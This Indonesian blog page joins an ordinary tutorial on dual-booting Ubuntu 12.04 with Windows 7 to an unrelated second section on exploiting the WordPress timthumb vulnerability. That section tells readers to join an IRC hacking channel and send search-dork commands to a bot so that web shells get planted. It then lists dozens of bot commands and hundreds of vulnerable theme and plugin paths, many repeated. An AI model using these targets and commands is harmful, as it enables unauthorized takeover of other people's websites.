Selamat Membaca Artikel UBUNTU-ID™

Install Dual Boot Ubuntu 12.04 In Windows7 the Partition

Hasil Boot In Windows7
 

Pepe | Tutorial di sore ini mengtengahkan tentang cara menginstal windows 7 dan Ubuntu sdalam satu komputer. Cara ini bisa menjadi solusi anda yang hanya punya satu komputer dan ingin menjalankan Ubuntu dan Windows dalam satu komputer anda.

Saya anggap  pada komputer Anda sudah terinstall Windows 7 dan juga komputer Anda memiliki ruang penyimpanan yang cukup untuk menginstal Ubuntu bersama windowsnya. Karena kebanyakan pada instalasi Windows, menempati seluruh hard disk.

Hal nomer satu yang harus sobat lakukan sebelum Cara  Instal Dual Boot Ubuntu 12.04 Dan Windows 7Di Satu Komputer adalah mengecilkan Partisi dan membuat/menyediakan ruang kosong untuk instalasi Ubuntunya. Serta, Hal lain yang harus di lakukan adalah

mem-backup data penting Anda sebelum memulai proses, tujuannya bila ada error, data2 anda tidak hilang.

1. Dan klik 'Start' -> lalu klik kanan 'Computer' dan pilih'Manage'
2. Selanjutnya, 'Disk Management' pilih dan klik kanan pada disk lokal (C lalu klik "Shrink Volume'
3. Sebagai contoh saya membuat ruang kosong/space ubuntu dengan kapasitas 8156 MB, ruang kosong ini saya ambil dari besar kapasitas pada (Local disk :C). Jika sudah selesai menentukan besar ruang kosong untuk ubuntunya, lalu Klik 'Shrink' 
4. Setelah mengecilkan drive dan membuat ruang kosong untuk ubuntunya, restart komputer Anda, pastikan bahwa CD / DVD Ubuntu sudah di masukkan ke dalam CD/DVD Room komputer anda. Jangan lupa juga setting boot dari CD / DVD.
5. Selanjutnya, pilih "Something Else" dan klik 'Continou'

6. Kemudian klik pada ruang kosong/free space yang sudah kita buat tadi, dan klik 'Add...' untuk mmembuat ruang swap.

7. Selanjutnya, tentukan jumlah swap untuk membuat. biasanya yang saya buat adalah 500 sampai 1000 MB. Jangan lupa untuk memilih "swap area". Klik Ok untuk menutup jendela.

8. Selanjutnya, klik 'Add..' lagi untuk membuat partisi Ubuntu dan menggunakan semua ruang bebas/free space yang tersedia. Pastikan untuk memilih garis miring (/) sebagai mount point.
9. Selanjutnya, Centang filesystem ext4. Sejauh ini kita sudah berhasil untuk menkonfigurasi aturan yang diperlukan sebelum mendualboot Windows dan Ubuntu. Lalu sekarang di lanjut dengan menginstal Ubuntunya, klik 'Install Now'
10. Lalu ikuti langkah - langkah penginstalannya hingga selesai,
Setelah instalasi udah selesai, maka anda akan disajikan dengan tampilan berikut saat anda memuali menyalahkan komputer anda, dan anda dapat memilih OS mana yang akan anda gunakan.
Silahkan dinikmati fitur multi komplit Selamat menikmati dual boot Windows 7 dengan Ubuntu 12.04 nya. Semoga Bermanfaat.

Bug dork timthumb IRC | ubuntu 11.04


1. Join ke irc.hacker-newbie.org dan masuk ke Channel #Skylandhacker

2. Kemudian Ketik !tum [bug dork] Contoh :

    !tum /wp-content/themes/modularity/includes/timthumb.php "Design by Graph Paper Press"

     Dan tekan Enter.

3. Kemudian kalau berhasil akan ada muncul URL dan buka URL Tersebut. Jika ada shell muncul maka anda berhasil :D



Ini dia Bug Dork nya, Cekibroot : 
 
 !tim /wp-content/themes/modularity/includes/timthumb.php "Design by Graph Paper Press"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/themes/cadabrapress/scripts/"
!tim /wp-content/themes/Avenue/timthumb.php "Avenue. All rights reserved."
!tim /wp-content/themes/thedawn/lib/scripts/timthumb.php "thedawn"
!tim /wp-content/themes/suffusion/timthumb.php "suffusion"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/widescreen/includes/timthumb.php "hide menu"
!tim /wp-content/themes/Nyke/timthumb.php "Nyke"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion WordPress theme by Sayontan Sinha"
!tim wp-content/themes/kingsize/timthumb.php "hide the navigation"
!tim wp-content/themes/headlines_enhanced/thumb.php "PLR Blogs � Sitemap � Privacy Policy"
!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"
!tim /wp-content/themes/sportpress/scripts/timthumb.php "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/eNews/timthumb.php /wp-content/themes/eNews/
!tim /wp-content/themes/Nova/timthumb.php /wp-content/themes/Nova/
!tim /wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/ "/plugins/igit-related-posts-with-thumb-images-after-posts/"
!tim /wp-content/themes/sportpress/scripts/ "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/announcement/functions/thumb.php /themes/announcement/functions/
!tim wp-content/themes/sportpress/scripts/thumb.php "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/LightBright/ "wp-content/themes/LightBright/"
!tim /wp-content/themes/Glider "wp-content/themes/Glider"
!tim wp-content/themes/Mystique/cache/ wp-content/themes/Mystique/cache/
!tim wp-content/plugins/uBillboard/ wp-content/plugins/uBillboard/
!tim wp-content/themes/wpuniversity/scripts/timthumb.php "wp-content/themes/wpuniversity/scripts"
!tim /wp-content/themes/mypolylens/sp-framework /wp-content/themes/mypolylens/sp-framework
!tim /wp-content/themes/sakura/plugins/woo-tumblog/ /wp-content/themes/sakura/plugins/woo-tumblog/
!tim /wp-content/themes/directorypress/ /wp-content/themes/directorypress/
!tim /wp-content/plugins/autofashion/ /wp-content/plugins/autofashion
!tim /wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php "/wp-content/themes/WPFanPro2.0/lib"
!tim /wp-content/themes/versatile /wp-content/themes/versatile
!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"
!tim /wp-content/plugins/akismet/ "/wp-content/plugins/akismet/"
!tim /wp-content/gd-star-rating/ "/wp-content/gd-star-rating/"
!tim /wp-content/themes/Memoir/ "/wp-content/themes/Memoir/"
!tim /blog/wp-content/themes/clockstone/images/
!tim /wp-content/themes/mio/sp-framework/timthumb/timthumb.php "/themes/mio/"
!tim /wp-content/themes/coda/ "/themes/coda/"
!tim /wp-content/themes/OptimizePress/ "/wp-content/themes/OptimizePress/"


wp-content/plugins/wp-pagenavi/timthumb.php
wp-content/plugins/wp-pagenavi/inc/timthumb.php
wp-content/plugins/wp-pagenavi/functions/timthumb.php
wp-content/plugins/wp-pagenavi/scripts/timthumb.php
wp-content/themes/canvas/timthumb.php
wp-content/themes/TheStyle/timthumb.php
wp-content/plugins/wp-mobile-detector/timthumb.php
wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/timthumb.php
wp-content/themes/Magnificent/timthumb.php
wp-content/themes/freshnews/timthumb.php
wp-content/themes/ElegantEstate/timthumb.php
wp-content/themes/bueno/timthumb.php
wp-content/themes/magazinum/scripts/timthumb.php
wp-content/themes/sportpress/scripts/timthumb.php
wp-content/themes/flashnews/timthumb.php
wp-content/plugins/dukapress/lib/timthumb.php
wp-content/plugins/shortcodes-ultimate/lib/timthumb.php
wp-content/plugins/islidex/js/timthumb.php
wp-content/plugins/highlighter/libs/timthumb.php
wp-content/plugins/wordpress-gallery-plugin/timthumb.php
wp-content/plugins/igit-posts-slider-widget/timthumb.php
wp-content/themes/Magnificent/scripts/timthumb.php
wp-content/themes/profitstheme_11/scripts/timthumb.php
wp-content/themes/MyProduct/scripts/timthumb.php
wp-content/themes/canvas/scripts/timthumb.php
wp-content/themes/Glow/scripts/timthumb.php
wp-content/themes/inspire/scripts/timthumb.php
wp-content/themes/overeasy/scripts/timthumb.php
wp-content/themes/Nova/scripts/timthumb.php
wp-content/themes/bueno/scripts/timthumb.php
wp-content/themes/themorningafter/scripts/timthumb.php
wp-content/themes/delegate/scripts/timthumb.php
wp-content/themes/Bold/scripts/timthumb.php
wp-content/themes/eVid/scripts/timthumb.php
wp-content/themes/Apz/scripts/timthumb.php
wp-content/themes/redcarpet/scripts/timthumb.php
wp-content/themes/irresistible/scripts/timthumb.php
wp-content/themes/OnTheGo/scripts/timthumb.php
wp-content/themes/max-3.0.0/scripts/timthumb.php
wp-content/themes/newsworld/scripts/timthumb.php
wp-content/themes/ColdStone/scripts/timthumb.php
wp-content/themes/Chameleon/scripts/timthumb.php
wp-content/themes/Polished/scripts/timthumb.php
wp-content/themes/sealight/scripts/timthumb.php
wp-content/themes/newsworld-1.0.0/scripts/timthumb.php
wp-content/themes/postcard/scripts/timthumb.php
wp-content/themes/Quadro/scripts/timthumb.php
wp-content/themes/aqua-blue/scripts/timthumb.php
wp-content/themes/wootube/scripts/timthumb.php
wp-content/themes/deep-blue/scripts/timthumb.php
wp-content/themes/flashnews/scripts/timthumb.php
wp-content/themes/sportpress/scripts/timthumb.php
wp-content/themes/coffeebreak/scripts/timthumb.php
wp-content/themes/mymag/scripts/timthumb.php
wp-content/themes/magazinum/scripts/timthumb.php
wp-content/themes/wp-creativix/scripts/timthumb.php
wp-content/themes/PureType/scripts/timthumb.php
wp-content/themes/cityguide/scripts/timthumb.php
wp-content/themes/cinch/scripts/timthumb.php
wp-content/themes/backstage/scripts/timthumb.php
wp-content/themes/profitstheme/scripts/timthumb.php
wp-content/themes/diarise/scripts/timthumb.php
wp-content/themes/ElegantEstate/scripts/timthumb.php
wp-content/themes/digitalfarm/scripts/timthumb.php
wp-content/themes/mystream/scripts/timthumb.php
wp-content/themes/object/scripts/timthumb.php
wp-content/themes/nomadic/scripts/timthumb.php
wp-content/themes/comfy-3.0.9/scripts/timthumb.php
wp-content/themes/metamorphosis/scripts/timthumb.php
wp-content/themes/retreat/scripts/timthumb.php
wp-content/themes/royalle/scripts/timthumb.php
wp-content/themes/openair/scripts/timthumb.php
wp-content/themes/thejournal/scripts/timthumb.php
wp-content/themes/PersonalPress/scripts/timthumb.php
wp-content/themes/slanted/scripts/timthumb.php
wp-content/themes/sophisticatedfolio/scripts/timthumb.php
wp-content/themes/TheStyle/scripts/timthumb.php
wp-content/themes/canvas/timthumb.php
wp-content/themes/TheSource/scripts/timthumb.php
wp-content/themes/Minimal/scripts/timthumb.php
wp-content/themes/typebased/scripts/timthumb.php
wp-content/themes/thestation/scripts/timthumb.php
wp-content/themes/bueno/timthumb.php
wp-content/themes/headlines/scripts/timthumb.php
wp-content/themes/inspire/timthumb.php
wp-content/themes/OptimizePress/timthumb.php
wp-content/themes/sealight/timthumb.php
wp-content/themes/SimplePress/timthumb.php
wp-content/themes/modularity/timthumb.php
wp-content/themes/AskIt/timthumb.php
wp-content/themes/headlines/timthumb.php
wp-content/themes/busybee/timthumb.php
wp-content/themes/diarise/timthumb.php
wp-content/themes/Glow/timthumb.php
wp-content/themes/gazette/timthumb.php
wp-content/themes/PersonalPress/timthumb.php
wp-content/themes/delicate/timthumb.php
wp-content/themes/premiumnews/timthumb.php
wp-content/themes/Nova/timthumb.php
wp-content/themes/overeasy/timthumb.php
wp-content/themes/spectrum/timthumb.php
wp-content/themes/delegate/timthumb.php
wp-content/themes/PureType/timthumb.php
wp-content/themes/skeptical/timthumb.php
wp-content/themes/TheSource/timthumb.php
wp-content/themes/typebased/timthumb.php
wp-content/themes/TheCorporation/timthumb.php
wp-content/themes/cityguide/timthumb.php
wp-content/themes/Minimal/timthumb.php
wp-content/themes/profitstheme/timthumb.php
wp-content/themes/crisp/timthumb.php
wp-content/themes/snapshot/timthumb.php
wp-content/themes/Apz/timthumb.php
wp-content/themes/ColdStone/timthumb.php
wp-content/themes/Bold/timthumb.php
wp-content/themes/13floor/timthumb.php
wp-content/themes/OnTheGo/timthumb.php
wp-content/themes/redcarpet/timthumb.php
wp-content/themes/Chameleon/timthumb.php
wp-content/themes/irresistible/timthumb.php
wp-content/themes/eVid/timthumb.php
wp-content/themes/max-3.0.0/timthumb.php
wp-content/themes/newsworld/timthumb.php
wp-content/themes/newsworld-1.0.0/timthumb.php
wp-content/themes/comfy-3.0.9/timthumb.php
wp-content/themes/eNews/timthumb.php
wp-content/themes/flashnews/timthumb.php
wp-content/themes/magazinum/timthumb.php
wp-content/themes/mymag/timthumb.php
wp-content/themes/sportpress/timthumb.php
wp-content/themes/postcard/timthumb.php
wp-content/themes/mimbopro/timthumb.php
wp-content/themes/themorningafter/timthumb.php
wp-content/themes/MyProduct/timthumb.php
wp-content/themes/cinch/timthumb.php
wp-content/themes/dailyedition/timthumb.php
wp-content/themes/coffeebreak/timthumb.php
wp-content/themes/digitalfarm/timthumb.php
wp-content/themes/ElegantEstate/timthumb.php
wp-content/themes/mystream/timthumb.php
wp-content/themes/nomadic/timthumb.php
wp-content/themes/openair/timthumb.php
wp-content/themes/LightBright/timthumb.php
wp-content/themes/wootube/timthumb.php
wp-content/themes/Quadro/timthumb.php
wp-content/themes/sophisticatedfolio/timthumb.php
wp-content/themes/slanted/timthumb.php
wp-content/themes/thejournal/timthumb.php
wp-content/themes/thestation/timthumb.php
wp-content/themes/Basic/timthumb.php
wp-content/themes/royalle/timthumb.php
wp-content/themes/eGamer/timthumb.php
wp-content/themes/metamorphosis/timthumb.php
wp-content/themes/object/timthumb.php
wp-content/themes/wp-creativix/timthumb.php
wp-content/themes/retreat/timthumb.php
wp-content/themes/profitstheme_11/timthumb.php
wp-content/themes/backstage/timthumb.php
wp-content/themes/aqua-blue/timthumb.php
wp-content/themes/deep-blue/timthumb.php
wp-content/themes/premiumnews/scripts/timthumb.php
wp-content/themes/sealight/tools/timthumb.php
wp-content/themes/SimplePress/tools/timthumb.php
wp-content/themes/wootube/tools/timthumb.php
wp-content/themes/headlines/tools/timthumb.php
wp-content/themes/typebased/tools/timthumb.php
wp-content/themes/MyProduct/tools/timthumb.php
wp-content/themes/inspire/tools/timthumb.php
wp-content/themes/OptimizePress/tools/timthumb.php
wp-content/themes/dailyedition/tools/timthumb.php
wp-content/themes/PersonalPress/tools/timthumb.php
wp-content/themes/delegate/tools/timthumb.php
wp-content/themes/coffeebreak/tools/timthumb.php
wp-content/themes/optimize/tools/timthumb.php
wp-content/themes/AskIt/tools/timthumb.php
wp-content/themes/PureType/tools/timthumb.php
wp-content/themes/eNews/tools/timthumb.php
wp-content/themes/modularity/tools/timthumb.php
wp-content/themes/snapshot/tools/timthumb.php
wp-content/themes/DeepFocus/tools/timthumb.php
wp-content/themes/eVid/tools/timthumb.php
wp-content/themes/deep-blue/tools/timthumb.php
wp-content/themes/nomadic/tools/timthumb.php
wp-content/themes/gazette/tools/timthumb.php
wp-content/themes/TheStyle/tools/timthumb.php
wp-content/themes/crisp/tools/timthumb.php
wp-content/themes/Nova/tools/timthumb.php
wp-content/themes/wp-creativix/tools/timthumb.php
wp-content/themes/diarise/tools/timthumb.php
wp-content/themes/Glow/tools/timthumb.php
wp-content/themes/themorningafter/tools/timthumb.php
wp-content/themes/OnTheGo/tools/timthumb.php
wp-content/themes/irresistible/tools/timthumb.php
wp-content/themes/Bold/tools/timthumb.php
wp-content/themes/busybee/tools/timthumb.php
wp-content/themes/Apz/tools/timthumb.php
wp-content/themes/Polished/tools/timthumb.php
wp-content/themes/postcard/tools/timthumb.php
wp-content/themes/TheCorporation/tools/timthumb.php
wp-content/themes/TheSource/tools/timthumb.php
wp-content/themes/openair/tools/timthumb.php
wp-content/themes/mymag/tools/timthumb.php
wp-content/themes/cityguide/tools/timthumb.php
wp-content/themes/object/tools/timthumb.php
wp-content/themes/Magnificent/tools/timthumb.php
wp-content/themes/13floor/tools/timthumb.php
wp-content/themes/premiumnews/tools/timthumb.php
wp-content/themes/ElegantEstate/tools/timthumb.php
wp-content/themes/sportpress/tools/timthumb.php
wp-content/themes/LightBright/tools/timthumb.php
wp-content/themes/freshnews/tools/timthumb.php
wp-content/themes/newsworld/tools/timthumb.php
wp-content/themes/delicate/tools/timthumb.php
wp-content/themes/spectrum/tools/timthumb.php
wp-content/themes/backstage/tools/timthumb.php
wp-content/themes/comfy-3.0.9/tools/timthumb.php
wp-content/themes/Minimal/tools/timthumb.php
wp-content/themes/overeasy/tools/timthumb.php
wp-content/themes/mimbopro/tools/timthumb.php
wp-content/themes/Chameleon/tools/timthumb.php
wp-content/themes/skeptical/tools/timthumb.php
wp-content/themes/ColdStone/tools/timthumb.php
wp-content/themes/profitstheme/tools/timthumb.php
wp-content/themes/profitstheme_11/tools/timthumb.php
wp-content/themes/TheProfessional/tools/timthumb.php
wp-content/themes/magazinum/tools/timthumb.php
wp-content/themes/Basic/tools/timthumb.php
wp-content/themes/flashnews/tools/timthumb.php
wp-content/themes/cinch/tools/timthumb.php
wp-content/themes/mystream/tools/timthumb.php
wp-content/themes/Widescreen/tools/timthumb.php
wp-content/themes/newsworld-1.0.0/tools/timthumb.php
wp-content/themes/redcarpet/tools/timthumb.php
wp-content/themes/eGamer/tools/timthumb.php
wp-content/themes/metamorphosis/tools/timthumb.php
wp-content/themes/Quadro/tools/timthumb.php
wp-content/themes/aqua-blue/tools/timthumb.php
wp-content/themes/bueno/tools/timthumb.php
wp-content/themes/canvas/tools/timthumb.php
wp-content/themes/skeptical/scripts/timthumb.php
wp-content/themes/max-3.0.0/tools/timthumb.php
wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php
wp-content/plugins/simple-post-thumbnails/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php
wp-content/plugins/simple-post-thumbnails/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php
wp-content/plugins/simple-post-thumbnails/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php
wp-content/plugins/simple-post-thumbnails/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php
wp-content/plugins/simple-post-thumbnails/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/feature-slideshow/timthumb.php
wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/timthumb.php
wp-content/plugins/todo-espaco-online-links-felipe/timthumb.php
wp-content/plugins/mediarss-external-gallery/timthumb.php
wp-content/plugins/rent-a-car/libs/timthumb.php
wp-content/plugins/vk-gallery/lib/timthumb.php
wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
wp-content/plugins/pictmobi-widget/timthumb.php
wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php
wp-content/plugins/simple-slide-show/timthumb.php
wp-content/plugins/communitypress/cp-themes/cp-default/timthumb.php
wp-content/plugins/kino-gallery/timthumb.php
wp-content/plugins/mobileposty-mobile-site-generator/timthumb.php
wp-content/plugins/thumbnails-anywhere/timthumb.php
wp-content/plugins/yd-export2email/timthumb.php
wp-content/plugins/wp-dailybooth/timthumb.php
wp-content/plugins/image-rotator-widget/timthumb.php
wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
wp-content/plugins/lisl-last-image-slider/timthumb.php
wp-content/plugins/cac-featured-content/timthumb.php
wp-content/plugins/image-symlinks/timthumb.php
wp-content/plugins/add-new-default-avatar-emrikols-fork/includes/timthumb.php
wp-content/plugins/kc-related-posts-by-category/timthumb.php
wp-content/plugins/cms-pack/timthumb.php
wp-content/plugins/tim-widget/scripts/timthumb.php
wp-content/plugins/a-gallery/timthumb.php
wp-content/plugins/igit-related-posts-widget/timthumb.php
wp-content/plugins/wps3slider/scripts/timthumb.php
wp-content/plugins/category-grid-view-gallery/includes/timthumb.php
wp-content/plugins/logo-management/includes/timthumb.php
wp-content/plugins/simple-coverflow/timthumb.php
wp-content/plugins/smart-related-posts-thumbnails/timthumb.php
wp-content/plugins/wptap-news-press-themeplugin-for-iphone/include/timthumb.php
wp-content/plugins/igit-posts-slider-widget/timthumb.php
wp-content/plugins/event-espresso-free/includes/functions/timthumb.php
wp-content/plugins/fotoslide/timthumb.php
wp-content/plugins/mangapress/includes/mangapress-timthumb.php
wp-content/plugins/wp-marketplace/libs/timthumb.php
wp-content/plugins/tag-gallery/timthumb/timthumb.php
wp-content/plugins/wp-slick-slider/includes/timthumb/timthumb.php
wp-content/plugins/sliceshow-slideshow/scripts/timthumb.php
wp-content/plugins/hungred-image-fit/scripts/timthumb.php
wp-content/plugins/sharepulse/timthumb.php
wp-content/plugins/wordpress-thumbnail-slider/timthumb.php
wp-content/plugins/thethe-image-slider/timthumb.php
wp-content/plugins/mobile-smart/includes/timthumb.php
wp-content/plugins/meenews-newsletter/inc/classes/timthumb.php
wp-content/plugins/wordpress-news-ticker-plugin/timthumb.php
wp-content/plugins/wordpress-gallery-plugin/timthumb.php
wp-content/plugins/sh-slideshow/timthumb.php
wp-content/plugins/db-toolkit/libs/timthumb.php
wp-content/plugins/geotag/tools/timthumb/timthumb.php
wp-content/plugins/jquery-slider-for-featured-content/scripts/timthumb.php
wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php
wp-content/plugins/verve-meta-boxes/tools/timthumb.php
wp-content/plugins/seo-image-galleries/timthumb.php
wp-content/plugins/islidex/js/timthumb.php
wp-content/plugins/featured-post-with-thumbnail/scripts/timthumb.php
wp-content/plugins/wp-featured-post-with-thumbnail/scripts/timthumb.php
wp-content/plugins/wp-thumbie/timthumb.php;;18755
wp-content/plugins/dukapress/lib/timthumb.php
wp-content/plugins/front-slider/scripts/timthumb.php
wp-content/plugins/shortcodes-ultimate/lib/timthumb.php
wp-content/plugins/vslider/timthumb.php
wp-content/plugins/wp-mobile-detector/timthumb.php
wp-content/plugins/yd-recent-posts-widget/timthumb/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/simple-post-thumbnails/timthumb.php
wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php
wp-content/themes/genoa/timthumb.php
wp-content/plugins/feature-slideshow/timthumb.php
wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/timthumb.php
wp-content/plugins/mediarss-external-gallery/timthumb.php
wp-content/plugins/rent-a-car/libs/timthumb.php
wp-content/plugins/vk-gallery/lib/timthumb.php
wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
wp-content/plugins/pictmobi-widget/timthumb.php
wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php
wp-content/plugins/simple-slide-show/timthumb.php
wp-content/plugins/communitypress/cp-themes/cp-default/timthumb.php
wp-content/plugins/kino-gallery/timthumb.php
wp-content/plugins/mobileposty-mobile-site-generator/timthumb.php
wp-content/plugins/thumbnails-anywhere/timthumb.php
wp-content/plugins/yd-export2email/timthumb.php
wp-content/plugins/wp-dailybooth/timthumb.php
wp-content/plugins/image-rotator-widget/timthumb.php
wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
wp-content/plugins/lisl-last-image-slider/timthumb.php
wp-content/plugins/cac-featured-content/timthumb.php
wp-content/plugins/image-symlinks/timthumb.php
wp-content/plugins/add-new-default-avatar-emrikols-fork/includes/timthumb.php
wp-content/plugins/kc-related-posts-by-category/timthumb.php
wp-content/plugins/cms-pack/timthumb.php
wp-content/plugins/tim-widget/scripts/timthumb.php
wp-content/plugins/a-gallery/timthumb.php
wp-content/plugins/igit-related-posts-widget/timthumb.php
wp-content/plugins/wps3slider/scripts/timthumb.php
wp-content/plugins/category-grid-view-gallery/includes/timthumb.php
wp-content/plugins/logo-management/includes/timthumb.php
wp-content/plugins/simple-coverflow/timthumb.php
wp-content/plugins/smart-related-posts-thumbnails/timthumb.php
wp-content/plugins/wptap-news-press-themeplugin-for-iphone/include/timthumb.php
wp-content/plugins/igit-posts-slider-widget/timthumb.php
wp-content/plugins/event-espresso-free/includes/functions/timthumb.php
wp-content/plugins/fotoslide/timthumb.php
wp-content/plugins/mangapress/includes/mangapress-timthumb.php
wp-content/plugins/wp-marketplace/libs/timthumb.php
wp-content/plugins/tag-gallery/timthumb/timthumb.php
wp-content/plugins/wp-slick-slider/includes/timthumb/timthumb.php
wp-content/plugins/sliceshow-slideshow/scripts/timthumb.php
wp-content/plugins/hungred-image-fit/scripts/timthumb.php
wp-content/plugins/sharepulse/timthumb.php
wp-content/plugins/wordpress-thumbnail-slider/timthumb.php
wp-content/plugins/thethe-image-slider/timthumb.php
wp-content/plugins/mobile-smart/includes/timthumb.php
wp-content/plugins/meenews-newsletter/inc/classes/timthumb.php
wp-content/plugins/wordpress-news-ticker-plugin/timthumb.php
wp-content/plugins/wordpress-gallery-plugin/timthumb.php
wp-content/plugins/sh-slideshow/timthumb.php
wp-content/plugins/db-toolkit/libs/timthumb.php
wp-content/plugins/geotag/tools/timthumb/timthumb.php
wp-content/plugins/jquery-slider-for-featured-content/scripts/timthumb.php
wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php
wp-content/plugins/verve-meta-boxes/tools/timthumb.php
wp-content/plugins/seo-image-galleries/timthumb.php
wp-content/plugins/islidex/js/timthumb.php
wp-content/plugins/featured-post-with-thumbnail/scripts/timthumb.php
wp-content/plugins/wp-featured-post-with-thumbnail/scripts/timthumb.php
wp-content/plugins/wp-thumbie/timthumb.php;;18755
wp-content/plugins/dukapress/lib/timthumb.php
wp-content/plugins/front-slider/scripts/timthumb.php
wp-content/plugins/shortcodes-ultimate/lib/timthumb.php
wp-content/plugins/vslider/timthumb.php
wp-content/plugins/wp-mobile-detector/timthumb.php
wp-content/plugins/yd-recent-posts-widget/timthumb/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/plugins/simple-post-thumbnails/timthumb.php
wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php
wp-content/themes/zcool-like/timthumb.php
wp-content/themes/wpbus-d4/includes/timthumb.php
wp-content/themes/wp-premium-orange/timthumb.php
wp-content/themes/wp-perfect/js/timthumb.php
wp-content/themes/wp-newsmagazine/scripts/timthumb.php
wp-content/themes/wp-creativix/scripts/timthumb.php
wp-content/themes/vibefolio-teaser-10/scripts/timthumb.php
wp-content/themes/versitility/timthumb.php
wp-content/themes/unity/timthumb.php
wp-content/themes/ugly/timthumb.php
wp-content/themes/typographywp/timthumb.php
wp-content/themes/twittplus/scripts/timthumb.php
wp-content/themes/ttnews-theme/timthumb.php
wp-content/themes/true-blue-theme/timthumb.php
wp-content/themes/travelogue-theme/scripts/timthumb.php
wp-content/themes/totallyred/scripts/timthumb.php
wp-content/themes/tm-theme/js/timthumb.php
wp-content/themes/the_dark_os/tools/timthumb.php
wp-content/themes/swift/timthumb.php
wp-content/themes/swift/includes/timthumb.php
wp-content/themes/suffusion/timthumb.php
wp-content/themes/squeezepage/timthumb.php
wp-content/themes/spotlight/timthumb.php
wp-content/themes/slidette/timThumb/timthumb.php
wp-content/themes/simplewhite/timthumb.php
wp-content/themes/simplenews_premium/scripts/timthumb.php
wp-content/themes/simple-red-theme/timthumb.php
wp-content/themes/simple-but-great/timthumb.php
wp-content/themes/shadow/timthumb.php
wp-content/themes/shaan/timthumb.php
wp-content/themes/regal/timthumb.php
wp-content/themes/probluezine/timthumb.php
wp-content/themes/postage-sydney/includes/timthumb.php
wp-content/themes/pico/scripts/timthumb.php
wp-content/themes/pearlie/scripts/timthumb.php
wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php
wp-content/themes/neofresh/timthumb.php
wp-content/themes/nash/theme-assets/php/timthumb.php
wp-content/themes/mystique/extensions/auto-thumb/timthumb.php
wp-content/themes/mymag/timthumb.php
wp-content/themes/my-heli/images/timthumb.php
wp-content/themes/moi-magazine/timthumb.php
wp-content/themes/make-money-online-theme/scripts/timthumb.php
wp-content/themes/make-money-online-theme-4/scripts/timthumb.php
wp-content/themes/make-money-online-theme-3/scripts/timthumb.php
wp-content/themes/make-money-online-theme-2/scripts/timthumb.php
wp-content/themes/make-money-online-theme-1/scripts/timthumb.php
wp-content/themes/magup/timthumb.php
wp-content/themes/litepress/scripts/timthumb.php
wp-content/themes/likehacker/timthumb.php
wp-content/themes/jellyfish/lib/rt-timthumb.php
wp-content/themes/iwana-v10/timthumb.php
wp-content/themes/impressio/timthumb/timthumb.php
wp-content/themes/ideatheme/timthumb.php
wp-content/themes/here-comes-the-bride/lib/rt-timthumb.php
wp-content/themes/heli-1-wordpress-theme/images/timthumb.php
wp-content/themes/greyzed/functions/efrog/lib/timthumb.php
wp-content/themes/greydove/timthumb.php
wp-content/themes/granite-lite/scripts/timthumb.php
wp-content/themes/go-green/modules/timthumb.php
wp-content/themes/fresh-blu/scripts/timthumb.php
wp-content/themes/flix/timthumb.php
wp-content/themes/fliphoto/timthumb.php
wp-content/themes/featuring/timthumb.php
wp-content/themes/famous/timthumb.php
wp-content/themes/evr-green/scripts/timthumb.php
wp-content/themes/epione/script/timthumb.php
wp-content/themes/dimenzion/timthumb.php
wp-content/themes/deep-blue/timthumb.php
wp-content/themes/dark-dream-media/timthumb.php
wp-content/themes/coverht-wp/scripts/timthumb.php
wp-content/themes/cover-wp/scripts/timthumb.php
wp-content/themes/constructor/timthumb.php
wp-content/themes/constructor/libs/timthumb.php
wp-content/themes/conceditor-wp-strict/scripts/timthumb.php
wp-content/themes/comet/scripts/timthumb.php
wp-content/themes/calotropis/includes/timthumb.php
wp-content/themes/business-turnkey/assets/js/timthumb.php
wp-content/themes/brochure-melbourne/includes/timthumb.php
wp-content/themes/brightsky/scripts/timthumb.php
wp-content/themes/breakingnewz/timthumb.php
wp-content/themes/bombax/includes/timthumb.php
wp-content/themes/bluemag/library/timthumb.php
wp-content/themes/blue-news/scripts/timthumb.php
wp-content/themes/blue-corporate-hyve-theme/timthumb.php
wp-content/themes/blogified/timthumb.php
wp-content/themes/bloggnorge-a1/scripts/timthumb.php
wp-content/themes/blex/scripts/timthumb.php
wp-content/themes/black_eve/timthumb.php
wp-content/themes/automotive-blog-theme/timthumb.php
